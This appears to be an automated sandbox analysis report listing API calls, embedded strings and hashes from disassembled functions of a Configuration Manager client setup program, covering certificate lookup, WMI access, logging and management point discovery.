                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00622D31
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622DAE
                                                                                            • Part of subcall function 00623D45: __EH_prolog3_catch.LIBCMT ref: 00623D4C
                                                                                            • Part of subcall function 00623034: __EH_prolog3_catch_GS.LIBCMT ref: 0062303E
                                                                                            • Part of subcall function 00623034: GetCurrentThreadId.KERNEL32 ref: 006230F5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622E1D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622E6F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622F97
                                                                                          Strings
                                                                                          • ..\CcmCert.cpp, xrefs: 00622D9E
                                                                                          • ..\CcmCert.cpp, xrefs: 00622E77
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00622E18
                                                                                          • 0 != ppCertContext, xrefs: 00622DA4
                                                                                          • , xrefs: 00622EFF
                                                                                          • ..\CcmCert.cpp, xrefs: 00622F87
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00622DA9
                                                                                          • CcmUtilLib::CcmGetCertificateContextEx1, xrefs: 00622D68
                                                                                          • ..\CcmCert.cpp, xrefs: 00622F9F
                                                                                          • CcmGetCertificateStoreName ( sCertStore ), xrefs: 00622E13
                                                                                          • CcmGetCertificateIssuers ( sCertIssuers ), xrefs: 00622E65
                                                                                          • ..\CcmCert.cpp, xrefs: 00622E0D
                                                                                          • ..\CcmCert.cpp, xrefs: 00622DB6
                                                                                          • $H|, xrefs: 00622ECB
                                                                                          • ..\CcmCert.cpp, xrefs: 00622E25
                                                                                          • ..\CcmCert.cpp, xrefs: 00622E5F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00622F92
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00622E6A
                                                                                          • CcmGetCertificateContextEx2( sCertStore, sCertIssuers, sCertSel, (BOOL)dwCertFirstFlag, 0x00000001 | 0x00000002 | 0x00000008, ppCe, xrefs: 00622F8D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3H_prolog3_catch
                                                                                          • String ID: $$H|$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$0 != ppCertContext$CcmGetCertificateContextEx2( sCertStore, sCertIssuers, sCertSel, (BOOL)dwCertFirstFlag, 0x00000001 | 0x00000002 | 0x00000008, ppCe$CcmGetCertificateIssuers ( sCertIssuers )$CcmGetCertificateStoreName ( sCertStore )$CcmUtilLib::CcmGetCertificateContextEx1
                                                                                          • API String ID: 3423034556-740011273
                                                                                          • Opcode ID: 13292a64d374fa5bb21250c3ae10a149c82ed6d9aad8dab98bc35c58cf4f8892
                                                                                          • Instruction ID: fa7c3be447fc0900aceff13c703f8a412e51b6b354d4eb7817504c8b43903663
                                                                                          • Opcode Fuzzy Hash: 13292a64d374fa5bb21250c3ae10a149c82ed6d9aad8dab98bc35c58cf4f8892
                                                                                          • Instruction Fuzzy Hash: 5681FFB1C0066AAACF10EBE4DD59EEEBB7AAF54710F10851DF511BB2C2D7346A05CB20
                                                                                          APIs
                                                                                            • Part of subcall function 005A1CAB: __EH_prolog3_GS.LIBCMT ref: 005A1CB2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005947C4
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeH_prolog3_LocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$.log$=$AADCLIENTAPPID$AADRESOURCEURI$AppendAutoUpgradeInfo()$LoadConfigFile()$Logs\$No valid source or MP locations$Pp\$SslState value: %lu$_uninstall.log$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$client.msi$;!$Fl
                                                                                          • API String ID: 154734393-94057155
                                                                                          • Opcode ID: 509651ffd3094d405c760d6fe4b12eb04cdf0dba1a434ee5262d5e1c9415c3d9
                                                                                          • Instruction ID: e253895ab8da794d5d4b4cd55e8b84c9fef23eb13ff94d9c437a1704c172b1cf
                                                                                          • Opcode Fuzzy Hash: 509651ffd3094d405c760d6fe4b12eb04cdf0dba1a434ee5262d5e1c9415c3d9
                                                                                          • Instruction Fuzzy Hash: 15F18E30944359EAEF25EBA0CD5EBDEBBB4AB22304F1444D9E2456B182CBB41F48DF51
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 005A1633
                                                                                          • lstrcmpiW.KERNEL32(?,CCMHTTPPORT,00000001,00000000,?,?,00000001,?), ref: 005A176B
                                                                                          • lstrcmpiW.KERNEL32(?,CCMHTTPSPORT), ref: 005A178B
                                                                                          • lstrcmpiW.KERNEL32(?,CCMHTTPSSTATE), ref: 005A17AB
                                                                                          • lstrcmpiW.KERNEL32(?,CCMCERTSTORE), ref: 005A17C6
                                                                                          • lstrcmpiW.KERNEL32(?,CCMCERTISSUERS), ref: 005A17DA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: lstrcmpi$H_prolog3_
                                                                                          • String ID: AADCLIENTAPPID$AADRESOURCEURI$CCMCERTISSUERS$CCMCERTSEL$CCMCERTSTORE$CCMFIRSTCERT$CCMHTTPPORT$CCMHTTPSPORT$CCMHTTPSSTATE$CCMPKICERTOPTIONS$smspublicrootkey
                                                                                          • API String ID: 534044287-981794382
                                                                                          • Opcode ID: 7cd4c2d5f5499459ea5e76937e3779abf04c01db043c9e7821cec36fd5d92a7b
                                                                                          • Instruction ID: 58491c3aa60e96860e80992be2a6eadd547c9a3f82e881e01ec36e499ae519ee
                                                                                          • Opcode Fuzzy Hash: 7cd4c2d5f5499459ea5e76937e3779abf04c01db043c9e7821cec36fd5d92a7b
                                                                                          • Instruction Fuzzy Hash: 3271B130A0060ADACF14EFA0C891EFD7FB5FF56750F541029E902BB186EB249942CBB4
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00602D5A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00602DB4
                                                                                            • Part of subcall function 006092A8: __EH_prolog3.LIBCMT ref: 006092AF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00602E0E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00602EF2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00602FDD
                                                                                          Strings
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602EE2
                                                                                          • null() == false, xrefs: 00602DAA
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602E16
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00602FD8
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602DFE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00602E09
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602DA4
                                                                                          • ppObject != 0, xrefs: 00602E04
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602FCD
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602FE5
                                                                                          • getPointer()->GetObject( (pszObjectPath != NULL) ? BString(pszObjectPath) : (BSTR)NULL, WBEM_FLAG_RETURN_WBEM_COMPLETE, pContext, , xrefs: 00602FD3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00602DAF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00602EED
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602DBC
                                                                                          • pThis->CheckConnection(), xrefs: 00602EE8
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602EFA
                                                                                          • CCM::Utility::Wmi::Namespace::Get, xrefs: 00602D6D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$CCM::Utility::Wmi::Namespace::Get$getPointer()->GetObject( (pszObjectPath != NULL) ? BString(pszObjectPath) : (BSTR)NULL, WBEM_FLAG_RETURN_WBEM_COMPLETE, pContext, $null() == false$pThis->CheckConnection()$ppObject != 0
                                                                                          • API String ID: 981364226-4056929528
                                                                                          • Opcode ID: 43fb094074059aaa0974fbdde2b910f6b9649f8f52b1a0bb9fa9ad2f342b979d
                                                                                          • Instruction ID: b81160ad772772b3c0977e41b499772337933db2dbc497c0766ba942ef425b12
                                                                                          • Opcode Fuzzy Hash: 43fb094074059aaa0974fbdde2b910f6b9649f8f52b1a0bb9fa9ad2f342b979d
                                                                                          • Instruction Fuzzy Hash: 687103B1AC0206AFDB18DF94CC5ABEEBE72AF44714F248019F5146B2D2C7784E41CB91
                                                                                          APIs
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 005F4099: __EH_prolog3.LIBCMT ref: 005F40A0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057F682
                                                                                            • Part of subcall function 005F4253: __EH_prolog3.LIBCMT ref: 005F425A
                                                                                          Strings
                                                                                          • No MP or source location has been explicitly specified. Trying to discover a valid content location..., xrefs: 0057F519
                                                                                          • GetDefaultSourceLocation( sSource ), xrefs: 0057F678
                                                                                          • Found last valid MP '%s'., xrefs: 0057F2FD
                                                                                          • /source:, xrefs: 0057F7F6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057F67D
                                                                                          • No valid source or MP locations, xrefs: 0057F873
                                                                                          • ccmsetup.cpp, xrefs: 0057F68A
                                                                                          • MP '%s' is HTTPS. Client does not allow to use PKI issued cert and is not AAD capable. Ignoring this MP., xrefs: 0057F45B
                                                                                          • x$k, xrefs: 0057F505
                                                                                          • |8k, xrefs: 0057F77A
                                                                                          • Looking for MPs from AD..., xrefs: 0057F561
                                                                                          • Ccmsetup run in remediation mode. Adding MPs from the client as backup., xrefs: 0057F26B
                                                                                          • ccmsetup.cab, xrefs: 0057F6F5
                                                                                          • Current directory '%s' is a valid source location., xrefs: 0057F78F
                                                                                          • Ccmsetup runs in standalone mode, save current directory for future remediation usage., xrefs: 0057F7DA
                                                                                          • ccmsetup.cpp, xrefs: 0057F672
                                                                                          • SMSSITECODE, xrefs: 0057F571
                                                                                          • Couldn't find an MP source through AD. Error 0x%x, xrefs: 0057F5C9
                                                                                          • Current directory '%s' is not a valid source location., xrefs: 0057F832
                                                                                          • k, xrefs: 0057F257
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3Thread
                                                                                          • String ID: k$%s, HRESULT=%08lx (%s,%lu)$/source:$Ccmsetup run in remediation mode. Adding MPs from the client as backup.$Ccmsetup runs in standalone mode, save current directory for future remediation usage.$Couldn't find an MP source through AD. Error 0x%x$Current directory '%s' is a valid source location.$Current directory '%s' is not a valid source location.$Found last valid MP '%s'.$GetDefaultSourceLocation( sSource )$Looking for MPs from AD...$MP '%s' is HTTPS. Client does not allow to use PKI issued cert and is not AAD capable. Ignoring this MP.$No MP or source location has been explicitly specified. Trying to discover a valid content location...$No valid source or MP locations$SMSSITECODE$ccmsetup.cab$ccmsetup.cpp$ccmsetup.cpp$x$k$|8k
                                                                                          • API String ID: 2223909941-3299787160
                                                                                          • Opcode ID: 5784fa7d588f334ff733ff54450abae0cccb7d81cf6fc409c3bdbaeb47e877a3
                                                                                          • Instruction ID: 4787eb3fa82fd9dd262f14e7710c9e0c15e6e4d9f87f27b5bee06bffac013d2b
                                                                                          • Opcode Fuzzy Hash: 5784fa7d588f334ff733ff54450abae0cccb7d81cf6fc409c3bdbaeb47e877a3
                                                                                          • Instruction Fuzzy Hash: F312B171D00219EEDF10DFA4D989BEDBFB5BF54304F1080A9E548A7282DBB45A88DF61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F2D3F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F2D7F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F2DCC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F2E09
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F2E6C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$RefreshConfiguration()$pLogHandler != 0$pLogHandler->pLogProc != 0$pLogHandler->uSize == sizeof(CcmLogHandlerInfo)
                                                                                          • API String ID: 3454896115-3937812083
                                                                                          • Opcode ID: 7a17c345f5d42f868d8cd2a88f7d94eee1874b3c9a4c01594bd35afc6250d062
                                                                                          • Instruction ID: cac0a8b75c1d42cbfebaa9cceaba228944acb07a2bf1546a3172674f126d2749
                                                                                          • Opcode Fuzzy Hash: 7a17c345f5d42f868d8cd2a88f7d94eee1874b3c9a4c01594bd35afc6250d062
                                                                                          • Instruction Fuzzy Hash: 45311EF1984249FAD722DB988C0AFFB3EA9BB95B14F144019F545EB2C1C6BD4E81C790
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00603DFB
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603E72
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603EE1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603F30
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$CCM::Utility::Wmi::Namespace::SetNamespacePath$Get(L"__SystemClass", &spObject)$\\%s\%s$__SERVER$__SystemClass$null() == false$spObject.GetString(L"__SERVER", sServer)
                                                                                          • API String ID: 2734623419-4121369068
                                                                                          • Opcode ID: 0c4c09efad65ed24cf9cf2a08b543cf19629edcb8a685676894616446c2a3438
                                                                                          • Instruction ID: 86cd2acd14d57d0a5b154dabe16d80a2f5d9f96f0846599a0eba1fff3431ba2d
                                                                                          • Opcode Fuzzy Hash: 0c4c09efad65ed24cf9cf2a08b543cf19629edcb8a685676894616446c2a3438
                                                                                          • Instruction Fuzzy Hash: 4E5101B0D80259EADB14EBA4CD0AFEEBF79AF51700F14405AF1056B2C2DBB81B05CB61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00607FCA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060802A
                                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00608060
                                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000,00000000,CCM::Utility::Filesystem::Path::CreateEx,00000020,005817C1,?,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY),?), ref: 00608069
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060809F
                                                                                          • LocalFree.KERNEL32(00000000,?,0000000C,00000000,00000001,00000000,00000000,CCM::Utility::Filesystem::Path::CreateEx,00000020,005817C1,?,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY),?), ref: 0060812F
                                                                                            • Part of subcall function 00607BCA: __EH_prolog3_catch_GS.LIBCMT ref: 00607BD4
                                                                                            • Part of subcall function 00607BCA: PathIsRelativeW.SHLWAPI(?,CCM::Utility::Filesystem::Path::Create), ref: 00607C44
                                                                                            • Part of subcall function 00607BCA: GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00607C97
                                                                                            • Part of subcall function 00607BCA: GetLastError.KERNEL32 ref: 00607CA1
                                                                                            • Part of subcall function 00607BCA: GetCurrentThreadId.KERNEL32 ref: 00607CDE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006080FE
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006080F9
                                                                                          • ..\path.cpp, xrefs: 0060801A
                                                                                          • ..\path.cpp, xrefs: 00608106
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060809A
                                                                                          • Path::Create(szPath, 0), xrefs: 00608020
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00608025
                                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW(szPermissions, 1, &psd, 0 ), xrefs: 00608095
                                                                                          • Path::Create(szPath, &sa), xrefs: 006080F4
                                                                                          • CCM::Utility::Filesystem::Path::CreateEx, xrefs: 00607FD7
                                                                                          • ..\path.cpp, xrefs: 0060808F
                                                                                          • ..\path.cpp, xrefs: 006080A7
                                                                                          • ..\path.cpp, xrefs: 006080EE
                                                                                          • ..\path.cpp, xrefs: 00608032
                                                                                          Similarity
                                                                                          • API ID: Current$Thread$DescriptorErrorLastSecurity$ConvertDirectoryFreeH_prolog3_catchH_prolog3_catch_LocalPathRelativeString
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$CCM::Utility::Filesystem::Path::CreateEx$ConvertStringSecurityDescriptorToSecurityDescriptorW(szPermissions, 1, &psd, 0 )$Path::Create(szPath, &sa)$Path::Create(szPath, 0)
                                                                                          • API String ID: 13163585-76545198
                                                                                          • Opcode ID: 01cbe9e2554783a1da45f1744c130005ed21834c5c6da148ee4e433d8b0c2ee3
                                                                                          • Instruction ID: 9d45bc225fb8bf87e9969ab4fea906b8b1a6597c9d074d4bf6af3f4b6a73c79d
                                                                                          • Opcode Fuzzy Hash: 01cbe9e2554783a1da45f1744c130005ed21834c5c6da148ee4e433d8b0c2ee3
                                                                                          • Instruction Fuzzy Hash: C631B6B1980305AEDB20EBA08C09FEF7E76AF51B51F148015FD41672D2C7B9494A87A1
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005801D4
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$($2$AADCLIENTAPPID$AADRESOURCEURI$CCM::LocationServices::CcmGetAADInfoFromCMG(sCMGMP, sClientAppId, sAADResourceUri, sAADAuthUrl)$CCM::LocationServices::CcmGetCMGMetaData( sSiteCode.c_str(), sCMGMP, arrCMGMPs, sTRK)$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$smsmplist
                                                                                          • API String ID: 2882836952-3928954566
                                                                                          • Opcode ID: 03b7c3b852c6c347cddaedc9244ab3dc4090864ad5ddd641b6f500b9f26b6c5c
                                                                                          • Instruction ID: 7566518a51abbf15635a0378a422673dc16fb12146fafa054052557d98d37a18
                                                                                          • Opcode Fuzzy Hash: 03b7c3b852c6c347cddaedc9244ab3dc4090864ad5ddd641b6f500b9f26b6c5c
                                                                                          • Instruction Fuzzy Hash: 43E1697180025CEEEB21EBA4CD89BEEBBB9AF51304F1080D9A54577182DB741F88DF61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F12C5
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1324
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F140B
                                                                                          • TlsGetValue.KERNEL32 ref: 005F1458
                                                                                          • TlsSetValue.KERNEL32(00000001,?,ConnectedStandby,00000000,?), ref: 005F14B8
                                                                                          • TlsSetValue.KERNEL32(00000000), ref: 005F1510
                                                                                          Strings
                                                                                          • ..\Logging.cpp, xrefs: 005F1413
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1406
                                                                                          • pszMessage != 0, xrefs: 005F131A
                                                                                          • g_LogHandlerInfo.pLogProc( sComponentName, sComponentContext, eLogType, pszSourceFile, uSourceLine, uThreadID, pszMessage ), xrefs: 005F1401
                                                                                          • ..\Logging.cpp, xrefs: 005F132C
                                                                                          • ..\Logging.cpp, xrefs: 005F1314
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F131F
                                                                                          • ..\Logging.cpp, xrefs: 005F13FB
                                                                                          • ConnectedStandby, xrefs: 005F1497, 005F14A0
                                                                                          Similarity
                                                                                          • API ID: Value$CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$ConnectedStandby$g_LogHandlerInfo.pLogProc( sComponentName, sComponentContext, eLogType, pszSourceFile, uSourceLine, uThreadID, pszMessage )$pszMessage != 0
                                                                                          • API String ID: 900394322-829089931
                                                                                          • Opcode ID: f928c09bbdfede23a1b7c3bf095c31c407cdd87fe6bef19c6eb63631489321b7
                                                                                          • Instruction ID: 692ef03e7314fed628c7a63076c208c1466b45233a5854ceaae2d4133c25f76c
                                                                                          • Opcode Fuzzy Hash: f928c09bbdfede23a1b7c3bf095c31c407cdd87fe6bef19c6eb63631489321b7
                                                                                          • Instruction Fuzzy Hash: 8961CD7180424CEEDF11CFA8CC49AEEBFB9BB45300F144069F952AB2A1D7B85A45DF61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F217F
                                                                                          • TlsGetValue.KERNEL32 ref: 005F21EC
                                                                                          • TlsSetValue.KERNEL32(00000001), ref: 005F2214
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F227C
                                                                                          • TlsSetValue.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000200,?), ref: 005F2349
                                                                                          Strings
                                                                                          • Core::FormatString(pszMessage, szBuf, va), xrefs: 005F2272
                                                                                          • ..\Logging.cpp, xrefs: 005F2303
                                                                                          • InternalLog(eLogType, pszSourceFile, uSourceLine, uThreadID, szBuf.size() == 0 ? szLogBuf : szBuf), xrefs: 005F22ED
                                                                                          • ..\Logging.cpp, xrefs: 005F226C
                                                                                          • ..\Logging.cpp, xrefs: 005F2288
                                                                                          • ..\Logging.cpp, xrefs: 005F22E7
                                                                                          • `)l, xrefs: 005F223F, 005F2245
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F2277
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F22F2
                                                                                          Similarity
                                                                                          • API ID: Value$CurrentH_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$Core::FormatString(pszMessage, szBuf, va)$InternalLog(eLogType, pszSourceFile, uSourceLine, uThreadID, szBuf.size() == 0 ? szLogBuf : szBuf)$`)l
                                                                                          • API String ID: 1415402150-3147551473
                                                                                          • Opcode ID: 9c9ef7c005c50462bfd82326a8ecec491f56d2dccfba408271675fa92ef6e52b
                                                                                          • Instruction ID: 833d3c1cd056bd7f404d1bc1a0f319bfae600a924991ceda1cbf43a3db347dd6
                                                                                          • Opcode Fuzzy Hash: 9c9ef7c005c50462bfd82326a8ecec491f56d2dccfba408271675fa92ef6e52b
                                                                                          • Instruction Fuzzy Hash: 6B416FF094126CAADB21DF548D85BEE7EB9BF44700F4080E5FA08A2292D2745F85DF55
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B61A5
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B6230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B6295
                                                                                          Strings
                                                                                          • Software\Microsoft\SMS\Mobile Client, xrefs: 005B61F3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B622B
                                                                                          • util.cpp, xrefs: 005B6238
                                                                                          • Failed to read assigned site code from registry. Error code = 0x%x, xrefs: 005B62F2
                                                                                          • GetAssignedSiteCode, xrefs: 005B61C1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B6290
                                                                                          • regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), szMobileClientKey, ulAccess), xrefs: 005B6226
                                                                                          • regKey.GetString(szAssignedSiteCode, sSiteCode), xrefs: 005B628B
                                                                                          • util.cpp, xrefs: 005B629D
                                                                                          • AssignedSiteCode, xrefs: 005B625D
                                                                                          • util.cpp, xrefs: 005B6285
                                                                                          • util.cpp, xrefs: 005B6220
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$AssignedSiteCode$Failed to read assigned site code from registry. Error code = 0x%x$GetAssignedSiteCode$Software\Microsoft\SMS\Mobile Client$regKey.GetString(szAssignedSiteCode, sSiteCode)$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), szMobileClientKey, ulAccess)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B511C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B51C2
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$DetectPlatform$Failed to detect platform (0x%08x).$GetProcessorArchitecture(sArch)$IA64 architecture is not supported.$Running on platform %s$X64$X86$ia64$util.cpp$util.cpp$x86
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B7120
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B71AB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B7210
                                                                                          Strings
                                                                                          • regKey.GetString(szMPList, sSMSMPList), xrefs: 005B7206
                                                                                          • regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_CcmRoot, ulAccess), xrefs: 005B71A1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B71A6
